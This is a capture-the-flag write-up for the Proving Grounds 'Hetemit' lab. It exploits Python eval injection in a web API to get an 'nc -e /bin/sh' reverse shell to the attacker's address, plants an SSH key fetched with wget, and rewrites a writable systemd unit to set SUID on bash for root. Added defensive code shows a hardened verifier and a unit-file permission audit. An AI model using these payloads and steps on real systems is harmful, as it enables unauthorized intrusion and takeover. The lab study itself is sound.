Hetemit
Exploitation guide for Hetemit | Proving Grounds
In this walkthrough we will get RCE by exploiting an insecure API endpoint that is vulnerable to Python command injection (the endpoint evaluates the submitted input). Then we will exploit insecure permissions on a systemd service file, which allow us to write to it and gain root privileges.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt
[sudo] password for imtodess:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
# run full tcp scan to find 18000 port
PORT STATE SERVICE VERSION
18000/tcp open biimenu?
List the available shares.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ smbclient -L \\$ip -U "" -N -p 445
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Cmeeks Disk cmeeks Files
IPC$ IPC IPC Service (Samba 4.11.2)
SMB1 disabled -- no workgroup available
Check the content of the Cmeeks share.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ smbclient '//192.168.233.117/Cmeeks' -p 445
Enter WORKGROUP\imtodess's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
We don't have permission to do anything. It is a similar case with FTP: even though anonymous access is allowed, we can't get anything out of either service.
Port 80 serves the default Apache page. Port 18000 has a web application where we can register a new account or log in. To register we need an invitation code, which we don't have, so we can't register any user. For login I tried common credentials, which didn't work.
When you visit the other web port (50000, the Werkzeug service) you will find two API endpoints listed: /generate and /verify.
Visit /generate. You will get a reply containing email@domain. This endpoint is probably used to generate a token for an email address. If you send a GET request you will get the same response every time. But if you send a POST request with email=test@test.com you will get a code. Now we have an invite code with which we can register a new user.
Now check the /verify endpoint. Similar to /generate, we won't get anything with GET; we need the POST method. Sending a POST request with code=yourgeneratedcode gives us an error, which is weird since I thought it was supposed to verify our invite code. It also reflects the data as well as performing evaluations on it.
We know it is running on Python, as it is powered by Werkzeug. If you send a POST request with code={os.popen("id").read()} it will get executed and we will get the result of the id command.
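The behaviour above (input reflected and evaluated) is what you get when a request parameter is spliced into an f-string that is then passed to eval(). The following is an added example, not the box's own source: verify_unsafe is an assumed reconstruction of the flaw, and generate/verify_safe show the hardened design, where the submitted code is treated as opaque data and compared in constant time against issued codes. The ISSUED_CODES store and the 16-hex-character code format are assumptions.

```python
import hmac
import secrets

# Constructed stand-in for the token store behind /generate (assumed design;
# the real app's storage is not shown in the walkthrough).
ISSUED_CODES = {}


def generate(email):
    """Issue a random 16-hex-character invite code for an email address."""
    code = secrets.token_hex(8)
    ISSUED_CODES[email] = code
    return code


def verify_unsafe(code):
    """Reconstruction of the flaw: the parameter is reflected through an
    f-string literal that is handed to eval(), so any {...} placeholder in
    the input is executed as Python before the string is returned."""
    return str(eval('f"' + code + '"'))  # input becomes part of the source


def verify_safe(code):
    """Hardened check: validate the format, compare in constant time against
    issued codes, and never reflect or evaluate the input."""
    if not isinstance(code, str) or len(code) != 16:
        return "invalid"
    if any(c not in "0123456789abcdef" for c in code):
        return "invalid"
    for issued in ISSUED_CODES.values():
        if hmac.compare_digest(issued, code):
            return "valid"
    return "invalid"
```

A harmless placeholder such as {1+1} is enough to confirm evaluation: the unsafe version returns 2, the hardened version rejects it.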
Since we now know there is command injection, we will try to get a reverse shell. First check whether the nc utility is available. It is, so let's start a netcat listener and execute the following command, which will give us a reverse shell.
code={os.popen("nc -e /bin/sh 192.168.49.233 21").read()}
Always use ports that are already open on the target machine instead of random ports, since random ports are blocked most of the time.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ nc -nvlp 21
listening on [any] 21 ...
connect to [192.168.49.233] from (UNKNOWN) [192.168.233.117] 54120
whoami
cmeeks
cd
ls
local.txt
register_hetemit
restjson_hetemit
share
cat local.txt
b36a40<Redacted>0878273e608e0
First of all, since the shell is unstable and non-interactive, we will try to get a stable, interactive shell. Using Python I couldn't upgrade my shell for some reason, so we will instead try another method, since SSH is open. We will put our SSH public key as authorized_keys in the home folder of user cmeeks. Host an HTTP server with Python in the directory where the public key is located.
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ ls
id_rsa id_rsa.pub known_hosts
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ cat id_rsa.pub
ssh-rsa <public key omitted> imtodess@deathnote
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Now download it on the target machine using wget and put it in the .ssh directory as authorized_keys.
cd .ssh
wget http://192.168.49.233/id_rsa.pub -O ./authorized_keys
ls
authorized_keys
cat authorized_keys
Now we can log in with our private SSH key.
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ ssh -i id_rsa cmeeks@192.168.233.117
The authenticity of host '192.168.233.117 (192.168.233.117)' can't be established.
ECDSA key fingerprint is SHA256:MFFT6T7cKQKYZFvmxut1kSewn7eGU1VpIZEAsLWNPHs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.233.117' (ECDSA) to the list of known hosts.
Activate the web console with: systemctl enable --now cockpit.socket
[cmeeks@hetemit ~]$ ls
local.txt register_hetemit restjson_hetemit share
Run sudo -l to see if there is any command we can run with sudo.
[cmeeks@hetemit tmp]$ sudo -l
Matching Defaults entries for cmeeks on hetemit:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
It seems we can reboot and shut down the target machine without any password.
Run the linpeas script to look for privilege escalation vectors.
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group cmeeks:
/etc/systemd/system/pythonapp.service
/var/tmp/dnf-cmeeks-swkpfzqf/dnf.librepo.log
/var/tmp/dnf-cmeeks-swkpfzqf/expired_repos.json
/var/tmp/dnf-cmeeks-swkpfzqf/hawkey.log
/tmp/linpeas.sh
From the result of linpeas we can see that we can write to one of the service files. Confirm it by executing ls -la /etc/systemd/system.
ls -la /etc/systemd/system
total 16
. . .
-rw-rw-r-- 1 root cmeeks 289 Aug 26 11:50 pythonapp.service
. . .
Check the content of the file.
[cmeeks@hetemit tmp]$ cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
We only need to be concerned with the ExecStart and User directives. We can escalate our privileges in various ways, but I will leave that for you to explore. We will just change the permissions of /bin/bash and reboot the target machine.
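The root cause here is a unit file that is root-owned but group-writable by cmeeks, combined with a NOPASSWD reboot that lets the user trigger a restart. The following is an added audit script, not part of the original walkthrough: it flags unit files a non-root user could edit and reports which command would run and as whom. SAMPLE_UNIT is a constructed copy of the pythonapp.service shown above; the pure function classify() takes the mode and owner as integers so the check can be exercised without root.

```python
import os
import stat

# Constructed copy of the unit from the walkthrough; on the box the file is
# root:cmeeks with mode 664, which is exactly the case this audit flags.
SAMPLE_UNIT = """[Unit]
Description=Python App
[Service]
ExecStart=flask run -h 0.0.0.0 -p 50000
User=cmeeks
"""


def parse_directives(text):
    """Collect ExecStart/User lines; systemd comments occupy whole lines."""
    found = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith(("#", ";")) and "=" in line:
            key, value = line.split("=", 1)
            if key in ("ExecStart", "User"):
                found[key] = value
    return found


def classify(mode, uid, gid, text):
    """Reasons a unit file is risky given its mode, owner and content.
    An empty list means only root can change what the unit runs."""
    reasons = []
    if uid != 0:
        reasons.append("owner uid %d is not root" % uid)
    if mode & stat.S_IWGRP and gid != 0:
        reasons.append("writable by group gid %d" % gid)
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if reasons:  # explain the impact: what would run, and as whom
        d = parse_directives(text)
        reasons.append("%s would run as %s on the next restart" % (
            d.get("ExecStart", "<no ExecStart>"), d.get("User", "root (default)")))
    return reasons


def audit_units(directory="/etc/systemd/system"):
    """Map path -> reasons for every unit a non-root user could edit."""
    report = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and name.endswith((".service", ".timer")):
            st = os.stat(path)
            with open(path) as fh:
                reasons = classify(st.st_mode, st.st_uid, st.st_gid, fh.read())
            if reasons:
                report[path] = reasons
    return report
```

Pair the report with sudo -l output: a writable unit plus a NOPASSWD reboot, halt or systemctl entry means the user controls what root executes at boot.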
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
# ExecStart changed: set the SUID bit on /bin/bash
ExecStart=chmod +s /bin/bash
TimeoutSec=30
RestartSec=15s
# User changed from cmeeks to root (comments must be on their own line; a trailing comment would be parsed as part of the value)
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
Restart the machine.
[cmeeks@hetemit tmp]$ sudo /sbin/reboot
Connection to 192.168.233.117 closed by remote host.
Connection to 192.168.233.117 closed.
Log in using SSH and check the permissions of /bin/bash to see if the SUID bit is set.
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ ssh -i id_rsa cmeeks@192.168.233.117
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Thu Aug 26 11:31:25 2021 from 192.168.49.233
-bash-4.4$ ls -la /bin/bash
-rwsr-sr-x. 1 root root 1219248 Nov 8 2019 /bin/bash
# the s in the permission bits shows it was successful.
Just run /bin/bash -p and we will be root.
-bash-4.4$ /bin/bash -p
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls
anaconda-ks.cfg proof.txt
bash-4.4# cat proof.txt
b4d872<redacted>efa40e99